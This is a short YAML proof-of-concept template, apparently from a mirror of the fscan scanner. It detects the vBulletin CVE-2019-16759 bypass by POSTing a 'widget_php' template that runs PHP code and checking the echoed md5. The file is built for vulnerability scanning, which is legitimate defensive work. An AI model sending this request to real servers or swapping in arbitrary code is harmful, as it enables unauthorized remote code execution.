mirror of https://github.com/qwqdanchun/fscan.git
18 lines
651 B
YAML
18 lines
651 B
YAML
|
name: poc-yaml-vbulletin-cve-2019-16759-bypass
|
||
|
set:
|
||
|
f1: randomInt(800000000, 900000000)
|
||
|
rules:
|
||
|
- method: POST
|
||
|
path: /ajax/render/widget_tabbedcontainer_tab_panel
|
||
|
headers:
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
body: >-
|
||
|
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}}));
|
||
|
follow_redirects: true
|
||
|
expression: |
|
||
|
response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json")
|
||
|
detail:
|
||
|
author: Loneyer
|
||
|
links:
|
||
|
- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
|